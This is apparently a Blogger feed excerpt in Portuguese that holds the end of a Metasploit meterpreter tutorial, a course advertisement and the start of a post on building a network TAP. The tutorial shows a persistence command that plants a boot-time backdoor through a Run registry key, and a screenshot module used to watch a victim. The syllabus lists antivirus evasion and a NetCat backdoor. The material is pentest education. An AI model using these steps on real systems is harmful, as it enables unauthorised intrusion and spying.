Muito prazer senhor Persistence! :P&lt;br /&gt;Para que possamos manter o acesso com a máquina alvo, precisamos executar o seguinte comando no console meterpreter mostrado logo abaixo, este script é super difícil de utilizá-lo!&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;meterpreter &gt; run persistence –X&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Está vendo que dificuldade você terá pra conseguir manter o acesso com a máquina?&lt;br /&gt;Brincadeiras a parte, vamos à explicação!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S4Etyp0UhgI/AAAAAAAAAHk/a6pZ6oGgxs8/s1600-h/runpersistence.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440680173082281474" style="margin: 0px auto 10px; display: block; width: 320px; height: 220px; text-align: center;" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S4Etyp0UhgI/AAAAAAAAAHk/a6pZ6oGgxs8/s320/runpersistence.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;O comando acima criará um arquivo executável na maquina destino, a opção –X serve para que o arquivo criado seja executado durante o boot da máquina destino, vejam onboot=true. Repare na saída do comando o endereço IP local da máquina do atacante e que ela escutará na porta 4444, que é a padrão, podemos alterar a porta padrão para outra que nos convenha usando a opção –p seguido do número da porta, exemplo, -p 5555.&lt;br /&gt;Veja que foi feito o upload do executável em C:\DOCUME~1\espreto\CONFIG~1\Temp\RVcLLgpYIYS.vbs e foi identificado com o PID 1052, vejam a saída do comando ps, e observem que foi criado com o nome wscript.exe.&lt;br /&gt;E em seguida, foi criado um arquivo autorun na seguinte chave do registro HKLM\Software\Microsoft\Windows\CurrentVersion\Run\yjvpnmqbcAXmWU.&lt;br /&gt;&lt;br /&gt;Para testarmos, feche a janela do nosso console msf e abra-a novamente, vamos configurar o exploit multi/handler para ficar aguardando pela conexão. Se você estiver utilizando uma máquina real ou virtual como alvo, desligue-a.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S4Et9FZhDQI/AAAAAAAAAHs/YDfaLn4Ge34/s1600-h/esperandopersistence.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440680352284740866" style="margin: 0px auto 10px; display: block; width: 320px; height: 274px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S4Et9FZhDQI/AAAAAAAAAHs/YDfaLn4Ge34/s320/esperandopersistence.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Conforme a imagem acima, agora ligue a máquina que estávamos atacando e espere alguns instantes para que possamos ganhar nossa Shell meterpreter.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S4EuHHjK_3I/AAAAAAAAAH0/aPuXsmyl2Cc/s1600-h/sessionmeterpreteraberta.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440680524660801394" style="margin: 0px auto 10px; display: block; width: 320px; height: 83px; text-align: center;" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S4EuHHjK_3I/AAAAAAAAAH0/aPuXsmyl2Cc/s320/sessionmeterpreteraberta.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Ok! Temos nossa Shell novamente e podemos continuar nossa exploração.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;PrintScreen&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Outro recurso legal que o meterpreter nos oferece, é a possibilidade de tirarmos um printscreen da máquina destino, assim podemos ver o que a nossa vítima está fazendo naquele momento, não tão interessante, mais dá pra dar umas boas risadas!&lt;br /&gt;&lt;br /&gt;Este é outro script extremamente difícil de usar. Reparem logo abaixo. :P&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EuRSumdRI/AAAAAAAAAH8/JQ5QdcSt48A/s1600-h/usandoespia.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440680699460220178" style="margin: 0px auto 10px; display: block; width: 320px; height: 83px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EuRSumdRI/AAAAAAAAAH8/JQ5QdcSt48A/s320/usandoespia.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Usamos o comando use espia, para carregar o módulo meterpreter e em seguida executamos o comando screenshot seguido pelo caminho onde será salvo nosso screenshot com o nome de print1.png. Viram a dificuldade? Hehehe! Vejam a saída da imagem abaixo!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S4Euk16dSnI/AAAAAAAAAIE/dZ7t8k8iF9U/s1600-h/print1.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440681035322706546" style="margin: 0px auto 10px; display: block; width: 320px; height: 240px; text-align: center;" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S4Euk16dSnI/AAAAAAAAAIE/dZ7t8k8iF9U/s320/print1.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Conclusão&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Como havia mencionado, o meterpreter oferece uma enorme flexibilidade para a pós-exploração, aqui neste artigo, escrevi algumas de suas particularidades. Poderia escrever um livro enorme sobre todas as possibilidades de uso para o framework! (Quem sabe!)&lt;br /&gt;&lt;br /&gt;De posse da Shell meterpreter existe diversos recursos que podemos utilizar para explorar ainda mais todos os recursos da rede, como, explorar outros computadores da rede a partir deste que estamos, habilitar o recurso de RDP (Remote Desktop Protocol), instalação de backdoors mais sofisticados, capturar hashs, dificultar o trabalho de perícia forense (Show!), entre várias outras possibilidades.&lt;br /&gt;&lt;br /&gt;Caso apareçam dúvidas (Óbvio) referentes a este artigo, peço que, se possível, me enviem um e-mail para robertoespreto@gmail.com, pois vejo minha caixa de entrada toda hora. Mandem sugestões também sobre o metasploit que assim que possível escreverei sobre o mesmo.&lt;br /&gt;&lt;br /&gt;Obrigado a todos e quem teve paciência de chegar até aqui!&lt;br /&gt;Abraços!!!&lt;br /&gt;&lt;br /&gt;3spreto&lt;br /&gt;®&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Referências.&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;1 – Metasploit&lt;br /&gt;&lt;a href="http://www.metasploit.com/"&gt;http://www.metasploit.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2 – Pen Tester&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/Penetration_test"&gt;http://en.wikipedia.org/wiki/Penetration_test&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3 – Linux&lt;br /&gt;&lt;a href="http://www.vivaolinux.com.br/linux/"&gt;http://www.vivaolinux.com.br/linux/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;4 – Redes de Computadores&lt;br /&gt;&lt;a href="http://pt.wikipedia.org/wiki/Rede_de_computadores"&gt;http://pt.wikipedia.org/wiki/Rede_de_computadores&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;5 – Introdução ao TCP/IP&lt;br /&gt;&lt;a href="http://www.vivaolinux.com.br/artigo/Introducao-ao-Protocolo-Internet-IP"&gt;http://www.vivaolinux.com.br/artigo/Introducao-ao-Protocolo-Internet-IP&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;6 – Virtualização&lt;br /&gt;&lt;a href="http://www.vivaolinux.com.br/artigo/Virtualizacao-Montando-uma-rede-virtual-para-testes-e-estudos-de-servicos-e-servidores"&gt;http://www.vivaolinux.com.br/artigo/Virtualizacao-Montando-uma-rede-virtual-para-testes-e-estudos-de-servicos-e-servidores&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;7 – SVN Metasploit&lt;br /&gt;&lt;a href="https://www.metasploit.com/svn/framework3/trunk/"&gt;https://www.metasploit.com/svn/framework3/trunk/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;8 – Virus Total&lt;br /&gt;&lt;a href="http://www.virustotal.com/pt/"&gt;http://www.virustotal.com/pt/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;9 – Scan Malware Jotti&lt;br /&gt;&lt;a href="http://virusscan.jotti.org/pt-br"&gt;http://virusscan.jotti.org/pt-br&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;10 – Keylogging&lt;br /&gt;&lt;a href="http://pt.wikipedia.org/wiki/Keylogger"&gt;http://pt.wikipedia.org/wiki/Keylogger&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;11 – Backdoor&lt;br /&gt;&lt;a href="http://pt.wikipedia.org/wiki/Backdoor"&gt;http://pt.wikipedia.org/wiki/Backdoor&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;12 – Sniffing&lt;br /&gt;&lt;a href="http://pt.wikipedia.org/wiki/Sniffing"&gt;http://pt.wikipedia.org/wiki/Sniffing&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;13 – Wireshark&lt;br /&gt;&lt;a href="http://www.wireshark.org/"&gt;http://www.wireshark.org/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;14 – TCPDUMP&lt;br /&gt;&lt;a href="http://www.tcpdump.org/"&gt;http://www.tcpdump.org/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;15 – Linguagem Ruby&lt;br /&gt;&lt;a href="http://www.ruby-lang.org/pt/"&gt;http://www.ruby-lang.org/pt/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;16 – Blog Codesec.&lt;br /&gt;&lt;a href="http://codesec.blogspot.com/"&gt;http://codesec.blogspot.com/&lt;/a&gt; &lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Tanks!!!&lt;/p&gt;&lt;br /&gt;&lt;p&gt;®&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-9203653420974986851?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/9203653420974986851/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2010/02/metasploit-exploitation.html#comment-form' title='10 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/9203653420974986851'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/9203653420974986851'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2010/02/metasploit-exploitation.html' title='Metasploit Exploitation'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_fzuc26ZLs28/S4EokIikRFI/AAAAAAAAAEU/fiprH94zicE/s72-c/topologia2.PNG' height='72' width='72'/><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-6778989519830965628</id><published>2010-01-27T20:36:00.031-02:00</published><updated>2010-02-23T00:59:26.710-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Curso Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='MSF'/><category scheme='http://www.blogger.com/atom/ns#' term='meterpreter'/><category scheme='http://www.blogger.com/atom/ns#' term='BackTrack Brasil'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='BackTrack'/><category scheme='http://www.blogger.com/atom/ns#' term='Msfconsole'/><category scheme='http://www.blogger.com/atom/ns#' term='metasploit'/><title type='text'>Curso Metasploit Intermediate em Campinas-SP</title><content type='html'>&lt;strong&gt;Metasploit - Penetration Testing Resources&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Metasploit fornece informações úteis e ferramentas para os penetration tester, pesquisadores de segurança e desenvolvedores de assinaturas para IDS. Este projeto foi criado para fornecer informações sobre técnicas de exploração e criar uma base de conhecimento funcional para os desenvolvedores e profissionais de segurança. AS ferramentas e informações contidas neste curso, será pura e exclusivamente para fins de teste e conhecimento.&lt;br /&gt;&lt;br /&gt;O curso tem cerca de 90% de pura prática e tem a duração de 8 horas (1 dia inteiro).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Ementa:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Introdução ao Framework Metasploit.&lt;/strong&gt;&lt;br /&gt;-- Historia do Framework;&lt;br /&gt;-- Time de Desenvolvedores;&lt;br /&gt;-- Tecnologias Utilizadas;&lt;br /&gt;-- Diferentes Interfaces do Framework;&lt;br /&gt;-- Msfweb;&lt;br /&gt;-- Msfcli;&lt;br /&gt;-- Msfgui;&lt;br /&gt;-- Msfconsole; (Utilizado no curso)&lt;br /&gt;-- Instalação em Diferentes SOs;&lt;br /&gt;-- Usando o LiveDVD BackTrack 4;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Conversando com o Metasploit.&lt;/strong&gt;&lt;br /&gt;-- Comando "help"&lt;br /&gt;-- Comando "show"&lt;br /&gt;-- Comando "search"&lt;br /&gt;-- Comando "info"&lt;br /&gt;-- Comando "use"&lt;br /&gt;-- Comando "connect"&lt;br /&gt;-- Comando "set"&lt;br /&gt;-- Comando "check"&lt;br /&gt;-- Comando "exploit/run"&lt;br /&gt;-- Comando "back"&lt;br /&gt;-- Comando "resource"&lt;br /&gt;-- Comando "irb"&lt;br /&gt;-- Comando "load"&lt;br /&gt;-- Entre outros...&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Técnicas de Pré-Exploração&lt;/strong&gt;&lt;br /&gt;-- Roubando Informações;&lt;br /&gt;-- Framework Dradis;&lt;br /&gt;-- Scanning de Portas;&lt;br /&gt;-- Importando/Exportando resultados;&lt;br /&gt;-- Ferramentas e Módulos Auxiliares;&lt;br /&gt;-- Procurando MSSQL;&lt;br /&gt;-- Identificação de Serviços;&lt;br /&gt;-- Sniffing de senhas;&lt;br /&gt;-- Usando o SNMP;&lt;br /&gt;-- Scanning de Vulnerabilidades (Nessus/OpenVAS);&lt;br /&gt;-- Checando login SMB;&lt;br /&gt;-- Autenticação VNC;&lt;br /&gt;-- WMAP Scanner WEB;&lt;br /&gt;-- Trabalhando com Fuzzers;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Exploração com o Metasploit&lt;/strong&gt;&lt;br /&gt;-- Explorando uma máquina MS;&lt;br /&gt;-- Explorando uma máquina Linux;&lt;br /&gt;-- Burlando Anti-virus;&lt;br /&gt;-- Explorando IIS, Apache;&lt;br /&gt;-- Dentre outros;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Técnicas de Pós-Exploração com MSF.&lt;/strong&gt;&lt;br /&gt;-- PSexec;&lt;br /&gt;-- Incognito;&lt;br /&gt;-- Interagindo com o registro;&lt;br /&gt;-- Backdoor com NetCat;&lt;br /&gt;-- Sniffing de Pacotes com Meterpreter;&lt;br /&gt;-- Pivoting;&lt;br /&gt;-- TimeStomp;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;O curso oferece:&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;# Certificado;&lt;br /&gt;# DVD com o BackTrack Personalizado pela equipe do BackTrack Brasil;&lt;br /&gt;# Apostila do Curso;&lt;br /&gt;# Coffe-Break (15 minutos durante a tarde);&lt;br /&gt;# Aulas práticas com as mais recentes vulnerabilidades;&lt;br /&gt;# Após o curso, será disponibilizado os slides e materiais adicionais para os alunos em seus e-mails;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Recursos da Sala de Aula:&lt;/strong&gt;&lt;br /&gt;# Ar-Condicionado;&lt;br /&gt;# Datashow;&lt;br /&gt;# 1 Computador por pessoa;&lt;br /&gt;# 2 Professores presentes no Curso (Equipe do BackTrack Brasil);&lt;br /&gt;&lt;br /&gt;O  curso &lt;span style="font-weight: bold;"&gt;"Metasploit Intermediate"&lt;/span&gt;,  será realizado na data 06 de março de 2010, tendo iníco as 8h e término  as 17h do mesmo dia.&lt;br /&gt;&lt;br /&gt;8h00 até 12h =&gt; Curso.&lt;br /&gt;12h até 13h   =&gt; Almoço (Não incluso).&lt;br /&gt;13h até 15h30min =&gt; Curso.&lt;br /&gt;15h30min  até 15h50min = Coffe-Break (Incluso).&lt;br /&gt;16h até 17h =&gt; Curso.&lt;br /&gt;&lt;br /&gt;O  valor para a 1ª turma está sendo oferecido a &lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;R$480,00&lt;/span&gt;&lt;/span&gt;, com a  forma de pagamento através do PagSeguro ou Depósito em Conta Bancária.&lt;br /&gt;Para  os interessados, as inscrições serão realizadas até o dia 25 de  fevereiro de 2010. Ainda existem vagas!!!&lt;br /&gt;&lt;br /&gt;Local situado na Rua Romualdo Andreazi, 677 - Jardim Trevo em Campinas - SP.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Para maiores informações entrar em contato conosco:&lt;span style="font-style:italic;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Roberto Soares (&lt;span style="font-weight:bold;"&gt;3spreto&lt;/span&gt;)&lt;br /&gt;espreto@backtrack.com.br&lt;br /&gt;Tel: (19) 9267-0320&lt;br /&gt;&lt;br /&gt;Mauro Risonho (&lt;span style="font-weight:bold;"&gt;Firebits&lt;/span&gt;)&lt;br /&gt;firebits@backtrack.com.br&lt;br /&gt;Tel: (19) 9698-2139&lt;br /&gt;&lt;br /&gt;Ou nos enviem um e-mail com seu número de telefone para podermos entrar em contato com você.&lt;br /&gt;&lt;br /&gt;Segue algumas fotos do  local onde será realizado o treinamento.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_fzuc26ZLs28/S3BqfyEpcpI/AAAAAAAAADU/kEMTLsaKc7M/s1600-h/01.png"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 284px; height: 213px;" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S3BqfyEpcpI/AAAAAAAAADU/kEMTLsaKc7M/s320/01.png" alt="" id="BLOGGER_PHOTO_ID_5435961844485943954" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/S3BqsRO5nyI/AAAAAAAAADc/e1L3lE9wvws/s1600-h/02.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 286px; height: 212px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S3BqsRO5nyI/AAAAAAAAADc/e1L3lE9wvws/s320/02.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5435962059008876322" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/S3BqyuLU0SI/AAAAAAAAADk/nf8gZDVAguA/s1600-h/03.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 285px; height: 213px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S3BqyuLU0SI/AAAAAAAAADk/nf8gZDVAguA/s320/03.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5435962169857724706" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_fzuc26ZLs28/S3Bq-sEmYfI/AAAAAAAAADs/3MBqDxV5Lt8/s1600-h/04.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 281px; height: 212px;" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S3Bq-sEmYfI/AAAAAAAAADs/3MBqDxV5Lt8/s320/04.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5435962375451075058" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_fzuc26ZLs28/S3BrFJYtEqI/AAAAAAAAAD0/UU_bBsdXC8U/s1600-h/05.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 284px; height: 212px;" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S3BrFJYtEqI/AAAAAAAAAD0/UU_bBsdXC8U/s320/05.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5435962486399242914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S4NSc-b5zLI/AAAAAAAAAIM/ykwNmulMyFc/s1600-h/FOLDER+CURSO+METASPLOIT.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 226px; height: 320px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S4NSc-b5zLI/AAAAAAAAAIM/ykwNmulMyFc/s320/FOLDER+CURSO+METASPLOIT.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5441283432543538354" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-6778989519830965628?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/6778989519830965628/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2010/01/curso-metasploit-intermediate-em.html#comment-form' title='3 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/6778989519830965628'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/6778989519830965628'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2010/01/curso-metasploit-intermediate-em.html' title='Curso Metasploit Intermediate em Campinas-SP'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_fzuc26ZLs28/S3BqfyEpcpI/AAAAAAAAADU/kEMTLsaKc7M/s72-c/01.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-8247493709516962060</id><published>2009-12-16T12:59:00.022-02:00</published><updated>2009-12-16T13:58:59.228-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Network TAP'/><category scheme='http://www.blogger.com/atom/ns#' term='sniffing'/><category scheme='http://www.blogger.com/atom/ns#' term='Bonding'/><category scheme='http://www.blogger.com/atom/ns#' term='Tráfego de Rede'/><category scheme='http://www.blogger.com/atom/ns#' term='BackTrack'/><category scheme='http://www.blogger.com/atom/ns#' term='tcpdump'/><category scheme='http://www.blogger.com/atom/ns#' term='wireshark'/><category scheme='http://www.blogger.com/atom/ns#' term='TAP'/><category scheme='http://www.blogger.com/atom/ns#' term='sniffers'/><title type='text'>Vai farejar aqui? (TAP na cara dele!)</title><content type='html'>&lt;span style="font-family:arial;"&gt;Apesar do título, não haverá nenhuma apologia a violência aqui galera, lhes garanto. :)&lt;br /&gt;Demonstrarei como criar um dispositivo simples para analisar/monitorar o tráfego de rede em nosso pequenino exemplo, conhecido como Network TAP, ou simplesmente, TAP. Já existem soluções profissionais para este fim. Aqui vamos criar algo rústico, que não deverá ser usado em um ambiente de produção, pois poderá perder o desempenho da sua rede, perca de pacotes, etc... Seria interessante para quem quiser estudar sobre &lt;em&gt;sniffers&lt;/em&gt;, sistemas IDS e outras técnicas de ataques.&lt;br /&gt;&lt;br /&gt;O que é &lt;em&gt;sniffing&lt;/em&gt;?&lt;br /&gt;&lt;br /&gt;&lt;em&gt;Sniffing&lt;/em&gt; é um procedimento realizado por uma ferramenta conhecida como &lt;em&gt;sniffer&lt;/em&gt;, que é capaz de interceptar e registrar o tráfego de dados em uma redes de computadores. O sniffing pode ser utilizado para fins maliciosos que poderiam tentar capturar o tráfego da rede com diversos objetivos, por exemplo, obter cópias de arquivos enquanto sua transmissão, obter senhas, ver as conversações em tempo real, etc...&lt;br /&gt;&lt;br /&gt;Chega de blá blá blá.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;TAP&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj3YNS-IgI/AAAAAAAAABk/dtzX5jzHw2c/s1600-h/16-12-09_1132.jpg"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 240px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415850547171172866" border="0" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj3YNS-IgI/AAAAAAAAABk/dtzX5jzHw2c/s320/16-12-09_1132.jpg" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family:arial;"&gt;Cenário Utilizado.&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/Syj6M4XajTI/AAAAAAAAABs/skrQYJ4_pb0/s1600-h/2.png"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 141px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415853651108990258" border="0" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/Syj6M4XajTI/AAAAAAAAABs/skrQYJ4_pb0/s320/2.png" /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Criei este ambiente apenas para fins didáticos, cabe a sua imaginação e conhecimento adequar para o necessário. Segue alguns itens utilizados:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;em&gt;&gt; Conexão Banda Larga;&lt;br /&gt;&gt; TAP;&lt;br /&gt;&gt; Micro1 com 2 Placas de Rede;&lt;br /&gt;&gt; Switch;&lt;br /&gt;&gt; Micro2 com Windows 7;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;strong&gt;Montado o TAP:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Utilizei 4 conectores fêmeas RJ-45 e pequenos pedaços de cabo cat-5e.&lt;br /&gt;Segue o esquema para a confecção do mesmo:&lt;br /&gt;&lt;/span&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj6XgV8lzI/AAAAAAAAAB0/qYGjSbPjbyM/s1600-h/3.gif"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 288px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415853833638942514" border="0" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj6XgV8lzI/AAAAAAAAAB0/qYGjSbPjbyM/s320/3.gif" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;FOTOS DO TAP:&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj6ohbktGI/AAAAAAAAAB8/ws_0FxCjdkQ/s1600-h/4.jpg"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 240px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415854125988754530" border="0" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj6ohbktGI/AAAAAAAAAB8/ws_0FxCjdkQ/s320/4.jpg" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj6wwm_OPI/AAAAAAAAACE/WW7oQN5Bp-c/s1600-h/5.jpg"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 240px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415854267502115058" border="0" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj6wwm_OPI/AAAAAAAAACE/WW7oQN5Bp-c/s320/5.jpg" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;br 